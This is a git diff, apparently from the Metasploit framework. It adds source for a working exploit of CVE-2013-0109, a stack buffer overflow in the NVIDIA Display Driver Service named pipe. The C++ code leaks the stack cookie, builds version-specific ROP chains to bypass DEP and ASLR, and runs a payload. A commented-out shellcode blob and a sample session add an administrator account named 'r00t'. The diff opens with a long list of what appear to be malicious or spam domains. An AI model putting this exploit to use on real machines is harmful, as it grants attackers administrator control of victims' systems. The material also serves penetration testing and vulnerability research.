+www.xn----7sbhclawz4amhce8d.xn--p1ai +www.xn----btbheac0cddhg5d.xn--p1ai +www.xxparceroxx.xpg.com.br +www.yac.mx +www.ypu.edu.tw +www.zfttk.ru +www.zyhydh.com +www.zyxyfy.com +www12.0zz0.com +www2.unionfilesexchnges.su +www8.0zz0.com +wzhj.net +wzk.laweb.es +xamateurpornlic.www1.biz +xaumous.club-106.com.ar +xbox360modding.net +xchao123.com +xe-11-0-0.edge1.losangeles6.levei-3.net +xeclex.bl.ee +xetoware.com +xiazaiba.com +xiistones.com +xindalawyer.com +xinrongcaijing.com +xisrandom.net +xixiwg.com +xlcall.com +xlike.net +xlkj518.com +xmlbar.net +xn----htbhgq6ahee6j.xn--p1ai +xnxxwatch.com +xoomer.alice.it +xoqaquqo.the-elites.com +xorgwebs.webs.com +xpopup.com +xpornstarsckc.ddns.name +xquadra.com.mx +xserqwerdsdrasder.su +xtcheats.com +xtractb2b.info +xtremcolors.com +xtremedownload.com +xvidly.com +xxooss.com +xxxsexcamera.com +xzone-reactor.com +xzskycn.com +y2030.com +y611trsk.witnessvacant.biz +yachtfortylove.com +yalupa.com +yambotan.ru +yamleg.fu8.com +yanasushi.eu +yandex.ru.sgtfnregsnet.ru +yankeezzzz.co.uk +yanqing888.net +yaowan.com +yawclovm.net +yayasanmahasiswa.my +yazminx.com +ybabc.com +ybaopay.com +ydqxt.com +yesboan.com +yessign.or.kr +ygla.ru +yileweb.com +yiliwa.com +yj1b4.ru +yldsjs.com +yontoo.com +yougube.com +youngdevan.com +yourfilesdatak.asia +youronlineinsuranceagent.com +youtibe.com +youtope.net +youtubeaccelerator.com +youtuhe.com +youxiaxiazai.com +ytanchor.com +ytdownloader.com +ytoimneyqawernmkla.deswelt.net +yunbo99.com +yvettedefrance.com +yxbao.com +yytt77.com +yyzsoft.com +z32538.nb.host127-0-0-1.com +z43b1z.eu +z7752.com +z8games.com +za.omovigminet.ru +zaebiz.eu +zaebstonrder.com +zametki-gurmana.ru +zapto.org +zbf1.com +zbjimg.com +zc287xl.servepics.com +zctei.com +zeus.guvencelikimalat.com +zgorogo.in.ua +zgsysz.com +zhenhua.org +zhongjiebao.com +zhuoku.com +zhuti.com +zhuti6.com +zillionfasttax.info +zilliontoolkitusa.info +zinetag.net +ziputil.net +zjject.com +zkic.com +zmp3.net +zook.co.kr +zoomaru.com +zoomdownloader.com +zous.szm.sk +zrtontoskerfree.net +zswe4tfrhdhthr5.su +ztgame.com.cn +zukkoshop.su +zwierzu.zxy.me +zxr0.chickenkiller.com +zxr0.strangled.net +zydsoft.com diff --git a/documentation/gendocs.sh b/documentation/gendocs.sh index 7936554f11..ec48ae53e7 100755 --- a/documentation/gendocs.sh +++ b/documentation/gendocs.sh @@ -1,15 +1 @@ -OPTS="-x .ut.rb -x .ts.rb -x samples -q" -BASE="$(dirname "$0")" -MSFDIR="${BASE}/.." -DOCDIR="${BASE}/api" -doc=$(which sdoc) - -if [ -z $doc ]; then - doc=$(which rdoc) -fi - -echo "Using ${doc} for doc generation" -echo "Putting docs in ${DOCDIR}" - -$doc $OPTS -t "Metasploit Documentation" -o ${DOCDIR} ${MSFDIR}/lib/rex ${MSFDIR}/lib/msf - +rake yard diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj index 8bc56a0824..b04cb3b239 100644 --- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj +++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj @@ -70,7 +70,8 @@ /ignore:4070 - editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 _DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions) diff --git a/external/source/exploits/cve-2013-0109/make.msbuild b/external/source/exploits/cve-2013-0109/make.msbuild new file mode 100755 index 0000000000..820c6d9b39 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/make.msbuild @@ -0,0 +1,18 @@ + + + + .\nvidia_nvsvc.sln + + + + + + + + + + + + + + diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc.sln b/external/source/exploits/cve-2013-0109/nvidia_nvsvc.sln new file mode 100755 index 0000000000..9a52c16683 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc.sln @@ -0,0 +1,22 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2013 +VisualStudioVersion = 12.0.21005.1 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "nvidia_nvsvc", "nvidia_nvsvc\nvidia_nvsvc.vcxproj", "{6B3FF768-1F25-49C1-8827-EDEC84D4749F}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Release|Win32 = Release|Win32 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.ActiveCfg = Debug|Win32 + {6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.Build.0 = Debug|Win32 + {6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.ActiveCfg = Release|Win32 + {6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/dllmain.c b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/dllmain.c new file mode 100755 index 0000000000..c75822e96b --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/dllmain.c @@ -0,0 +1,33 @@ +//===============================================================================================// +// This is a stub for the actual functionality of the DLL. +//===============================================================================================// + +#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR +#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN +#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" + +#include "nvidia_nvsvc.h" + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) +{ + BOOL bReturnValue = TRUE; + switch (dwReason) + { + case DLL_QUERY_HMODULE: + hAppInstance = hinstDLL; + if (lpReserved != NULL) + { + *(HMODULE *)lpReserved = hAppInstance; + } + break; + case DLL_PROCESS_ATTACH: + hAppInstance = hinstDLL; + elevate_nvidia_nvsvc(lpReserved); + break; + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return bReturnValue; +} \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp new file mode 100755 index 0000000000..68fd9dd039 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp @@ -0,0 +1,546 @@ +/* +NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012 +- Bypass DEP + ASLR + /GS + CoE +============================================================= +(@peterwintrsmith) + + ** Initial release 25/12/12 + ** Update 25/12/12 - Target for 30 Aug 2012 nvvsvc.exe Build - thanks + @seanderegge! + +Hey all! + +Here is an interesting exploit for a stack buffer overflow in the NVidia +Display Driver Service. The service listens on a named pipe (\pipe\nsvr) +which has a NULL DACL configured, which should mean that any logged on user +or remote user in a domain context (Windows firewall/file sharing +permitting) should be able to exploit this vulnerability. + +The buffer overflow occurs as a result of a bad memmove operation, with the +stack layout effectively looking like this: + +[locals] +[received-data] +[response-buf] +[stack cookie] +[return address] +[arg space] +[etc] + +The memmove copies data from the received-data buffer into the response-buf +buffer, unchecked. It is possible to control the offset from which the copy +starts in the received-data buffer by embedding a variable length string - +which forms part of the protocol message being crafted - as well as the +number of bytes copied into the response buffer. + +The amount of data sent back over the named pipe is related to the number +of bytes copied rather than the maximum number of bytes that the buffer is +able to safely contain, so it is possible to leak stack data by copying +from the end of the received-data buffer, through the response-buf buffer +(which is zeroed first time round, and second time round contains whatever +was in it beforehand), right to the end of the stack frame (including stack +cookie and return address). + +As the entire block of data copied is sent back, the stack cookie and +nvvsvc.exe base can be determined using the aforementioned process. The +stack is then trashed, but the function servicing pipe messages won't +return until the final message has been received, so it doesn't matter too +much. + +It is then possible to exploit the bug by sending two further packets of +data: One containing the leaked stack cookie and a ROP chain dynamically +generated using offsets from the leaked nvvsvc.exe base (which simply fills +the response-buf buffer when this data is echoed back) and a second packet +which contains enough data to trigger an overwrite if data is copied from +the start of the received-data buffer into the response-buf (including the +data we primed the latter to contain - stack cookie and ROP chain). + +Allowing the function to then return leads to execution of our ROP chain, +and our strategically placed Metasploit net user /add shellcode! We get +continuation of execution for free because the process spins up a thread +to handle each new connection, and there are no deadlocks etc. + +I've included two ROP chains, one which works against the nvvsvc.exe +running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers +from the Dell site, and one which works against the latest version of the +drivers for the same card, from: +http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m +http://www.geforce.co.uk/drivers/results/54709 + +Hope you find this interesting - it's a fun bug to play with! + +- Sample Session - + + +C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators +Alias name administrators +Comment Administrators have complete and unrestricted access to the computer/domain + +Members + +------------------------------------------------------------------------------- +Administrator +Peter +The command completed successfully. + + +C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1 + ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) ** + [@peterwintrsmith] + - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 - + + Action 1 of 9: - CONNECT + + Action 2 of 9: - CLIENT => SERVER + Written 16416 (0x4020) characters to pipe + + Action 3 of 9: - SERVER => CLIENT + Read 16504 (0x4078) characters from pipe + + Action 4 of 9: Building exploit ... + => Stack cookie 0xe2e2893340d4: + => nvvsvc.exe base 0x13fb90000: + + Action 5 of 9: - CLIENT => SERVER + Written 16416 (0x4020) characters to pipe + + Action 6 of 9: - SERVER => CLIENT + Read 16384 (0x4000) characters from pipe + + Action 7 of 9: - CLIENT => SERVER + Written 16416 (0x4020) characters to pipe + + Action 8 of 9: - SERVER => CLIENT + Read 16896 (0x4200) characters from pipe + + Action 9 of 9: - DISCONNECT + +C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators +Alias name administrators +Comment Administrators have complete and unrestricted access to the computer/domain + +Members + +------------------------------------------------------------------------------- +Administrator +Peter +r00t +The command completed successfully. + + +C:\Users\Peter\Desktop\NVDelMe1> + +*/ + +#include +#include +extern "C" { +#include "nvidia_nvsvc.h" +} + +enum EProtocolAction +{ + ProtocolAction_Connect = 0, + ProtocolAction_Receive, + ProtocolAction_Send, + ProtocolAction_Disconnect, + ProtocolAction_ReadCookie, +}; + +typedef struct +{ + EProtocolAction Action; + PBYTE Buf; + DWORD Length; +} ProtocolMessage; + +const int GENERIC_BUF_LENGTH = 0x10000; + +#define WriteByte(val) {buf[offs] = val; offs += 1;} +#define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;} +#define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;} +#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;} +#define BufRemaining() (sizeof(buf) - offs) + +DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer) +{ + DWORD dwWritten = 0; + + if (WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL)) + { + return dwWritten; + } + + return 0; +} + +DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE) +{ + DWORD dwRead = 0, dwAvailable = 0; + + if (bTimeout) + { + for (DWORD i = 0; i < 30; i++) + { + if (!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL)) + { + goto Cleanup; + } + + if (dwAvailable) + { + break; + } + + Sleep(100); + } + + if (!dwAvailable) + { + goto Cleanup; + } + } + + if (!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL)) + { + goto Cleanup; + } + +Cleanup: + return dwRead; +} + +HANDLE EstablishPipeConnection(char *pszPipe) +{ + HANDLE hPipe = CreateFileA( + pszPipe, + GENERIC_READ | GENERIC_WRITE, + 0, + NULL, + OPEN_EXISTING, + 0, + NULL + ); + + if (hPipe == INVALID_HANDLE_VALUE) + { + return NULL; + } + + return hPipe; +} + +BYTE *BuildMalicious_LeakStack() +{ + static BYTE buf[0x4020] = {0}; + UINT offs = 0; + + WriteWord(0x52); + + for(UINT i=0; i<0x2000; i++) + WriteWord(0x41); + + WriteWord(0); + + WriteDword(0); + WriteDword(0x4078); + + WriteDword(0x41414141); + WriteDword(0x41414141); + WriteDword(0x41414141); + WriteDword(0x41414141); + WriteDword(0x41414141); + + return buf; +} + +BYTE *BuildMalicious_FillBuf() +{ + static BYTE buf[0x4020] = {0}; + UINT offs = 0; + + WriteWord(0x52); + WriteWord(0); // string + + WriteDword(0); + WriteDword(0x4000); + + while(BufRemaining()) + WriteDword(0x43434343); + + return buf; +} + +BYTE *BuildMalicious_OverwriteStack() +{ + static BYTE buf[0x4020] = { 0 }; + UINT offs = 0; + + WriteWord(0x52); + WriteWord(0); // string + + WriteDword(0); + WriteDword(0x4340); // enough to copy shellcode too + + while (BufRemaining()) + { + WriteDword(0x42424242); + } + + return buf; +} + +/*! + * @brief Entry point for the exploit code. + * @param payload Pointer to the payload memory, which must be NULL terminated. + */ +VOID elevate_nvidia_nvsvc(LPVOID payload) +{ + SIZE_T payloadLen = strlen((char*)payload) + 1; + DWORD dwReturnCode = 1, dwBytesInOut = 0; + HANDLE hPipe = NULL; + + static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = { 0 }; + + memset(rgReadBuf, 0, sizeof(rgReadBuf)); + + ProtocolMessage rgConvoMsg[] = + { + { ProtocolAction_Connect, NULL, 0 }, + { ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020 }, + { ProtocolAction_Receive, { 0 }, 0x4200 }, + { ProtocolAction_ReadCookie, { 0 }, 0 }, + { ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020 }, + { ProtocolAction_Receive, { 0 }, 0x4000 }, + { ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020 }, + { ProtocolAction_Receive, { 0 }, 0x4200 }, + { ProtocolAction_Disconnect, NULL, 0 }, + }; + + DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0; + BOOL bTryAgain = FALSE; + char szPipe[256] = "\\\\.\\pipe\\nvsr"; + + // We could renable remote hosts to target other devices on network?! + // sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]); + + while (i < dwNumberOfMessages) + { + printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages); + + switch (rgConvoMsg[i].Action) + { + case ProtocolAction_Connect: + printf(" - CONNECT\n"); + + hPipe = EstablishPipeConnection(szPipe); + if (!hPipe) + { + printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError()); + goto Cleanup; + } + + break; + case ProtocolAction_Disconnect: + printf(" - DISCONNECT\n"); + + CloseHandle(hPipe); + hPipe = NULL; + + break; + case ProtocolAction_Send: + printf(" - CLIENT => SERVER\n"); + + if (!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length))) + { + printf("!! Error writing to pipe\n"); + goto Cleanup; + } + + printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut); + + break; + case ProtocolAction_Receive: + printf("\t - SERVER => CLIENT\n"); + + if (!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE))) + { + printf("!! Error reading from pipe (at least, no data on pipe)\n"); + goto Cleanup; + } + + printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut); + + break; + case ProtocolAction_ReadCookie: + + // x64 Metasploit cmd/exec: + // "net user r00t r00t00r! /add & net localgroup administrators /add" + // exitfunc=thread + /*char code[] = "" + "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" + "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" + "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" + "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" + "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" + "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" + "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" + "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" + "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" + "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" + "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" + "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" + "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" + "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" + "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" + "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" + "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" + "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" + "\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30" + "\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64" + "\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72" + "\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74" + "\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";*/ + printf("Building exploit ...\n"); + unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034); + printf("\t\t => Stack cookie 0&x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie); + + memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8); + + unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL; + + // Perform some limited fingerprinting (my default install version, vs latest at time of testing) + switch (uiRetnAddress & 0xfff) + { + case 0x640: // nvvsvc.exe - 03 Nov 2011 - 1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d + uiBase = uiRetnAddress - 0x4640; + printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); + + pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8)); + + // Param 1: lpAddress [r11 (near rsp) into rcx] + pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn + pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn + pRopChain[2] = 0; // Padding + pRopChain[3] = 0; // ... + pRopChain[4] = 0; // ... + pRopChain[5] = 0; // ... + pRopChain[6] = 0; // ... + pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn + pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] + pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn + pRopChain[10] = 0; // Padding + pRopChain[11] = 0; // ... + pRopChain[12] = 0; // ... + pRopChain[13] = 0; // ... + pRopChain[14] = 0; // ... + pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn + pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] + pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn + // Param 4: lpflOldProtect [r9 - already points at writable location] + pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect + pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn + pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax + pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect) + + memcpy(pRopChain + 22, payload, payloadLen); + break; + case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f + uiBase = uiRetnAddress - 0x39f1; + printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); + + pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8)); + + // Param 1: lpAddress [r11 (near rsp) into rcx] + pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn + pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn + pRopChain[2] = 0; // Padding ... + pRopChain[3] = 0; // ... + pRopChain[4] = 0; // ... + pRopChain[5] = 0; // ... + pRopChain[6] = 0; // ... + pRopChain[7] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn + pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] + pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn + pRopChain[10] = 0; // Padding ... + pRopChain[11] = 0; // ... + pRopChain[12] = 0; // ... + pRopChain[13] = 0; // ... + pRopChain[14] = 0; // ... + // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] + pRopChain[15] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn + pRopChain[16] = 0x40; // PAGE_EXECUTE_READWRITE + pRopChain[17] = uiBase + 0x8b92; // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn + pRopChain[18] = 0; // Padding ... + pRopChain[19] = 0; // ... + pRopChain[20] = 0; // ... + pRopChain[21] = 0; // ... + pRopChain[22] = 0; // ... + // Param 4: lpflOldProtect [r9 - already points at writable location] + pRopChain[23] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn + pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130 + pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn + pRopChain[26] = 0; // Padding ... + pRopChain[27] = 0; // ... + pRopChain[28] = 0; // ... + pRopChain[29] = 0; // ... + pRopChain[30] = 0; // ... + pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax + pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp + + memcpy(pRopChain + 33, payload, payloadLen); + break; + case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b + uiBase = uiRetnAddress - 0x3a11; + printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); + + pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8)); + + // Param 1: lpAddress [r11 (near rsp) into rcx] + pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn + pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn + pRopChain[2] = 0; // Padding ... + pRopChain[3] = 0; // ... + pRopChain[4] = 0; // ... + pRopChain[5] = 0; // ... + pRopChain[6] = 0; // ... + pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn + pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] + pRopChain[9] = 0; // Padding ... + // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] + pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn + pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE + pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn + pRopChain[13] = 0; // Padding ... + pRopChain[14] = 0; // ... + pRopChain[15] = 0; // ... + pRopChain[16] = 0; // ... + pRopChain[17] = 0; // ... + // Param 4: lpflOldProtect [r9 - already points at writable location] + pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn + pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128 + pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn + pRopChain[21] = 0; // Padding ... + pRopChain[22] = 0; // ... + pRopChain[23] = 0; // ... + pRopChain[24] = 0; // ... + pRopChain[25] = 0; // ... + pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax + pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn + + memcpy(pRopChain + 28, payload, payloadLen); + break; + } + + break; + } + + i++; + } + +Cleanup: + if (hPipe) + { + CloseHandle(hPipe); + } +} \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.h b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.h new file mode 100755 index 0000000000..697b58450b --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.h @@ -0,0 +1,6 @@ +#ifndef _METASPLOIT_SOURCE_NVIDIA_NVSVC_H +#define _METASPLOIT_SOURCE_NVIDIA_NVSVC_H + +VOID elevate_nvidia_nvsvc(LPVOID payload); + +#endif diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj new file mode 100755 index 0000000000..41d2cbd3f2 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj @@ -0,0 +1,142 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + + {6B3FF768-1F25-49C1-8827-EDEC84D4749F} + nvidia_nvsvc + Win32Proj + + + + DynamicLibrary + MultiByte + false + v120 + + + DynamicLibrary + MultiByte + v120 + + + + + + + + + + + <_ProjectFileVersion>10.0.30319.1 + $(Configuration)\$(Platform)\ + $(Configuration)\$(Platform)\ + false + false + AllRules.ruleset + + + $(ProjectName).$(PlatformShortName) + + + + Disabled + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + WIN32;_DEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions) + true + EnableFastChecks + MultiThreadedDebug + + + Level3 + + + Mpr.lib;%(AdditionalDependencies) + %(AdditionalLibraryDirectories) + %(DelayLoadDLLs) + true + Windows + MachineX86 + + + /ignore:4070 + + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL + + + _DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions) + + + + + MinSpace + OnlyExplicitInline + false + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + WIN32;NDEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions) + true + MultiThreaded + false + + + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + Size + + + Mpr.lib;%(AdditionalDependencies) + %(AdditionalLibraryDirectories) + false + %(IgnoreSpecificDefaultLibraries) + %(DelayLoadDLLs) + false + true + $(OutDir)\nvidia_nvsvc.map + Windows + + + + + false + + + $(OutDir)\nvidia_nvsvc.lib + MachineX86 + false + + + /ignore:4070 + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-0109\" GOTO COPY + mkdir "..\..\..\..\..\data\exploits\CVE-2013-0109\" +:COPY +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-0109\" + + + + + + + + + + + + + + \ No newline at end of file diff --git 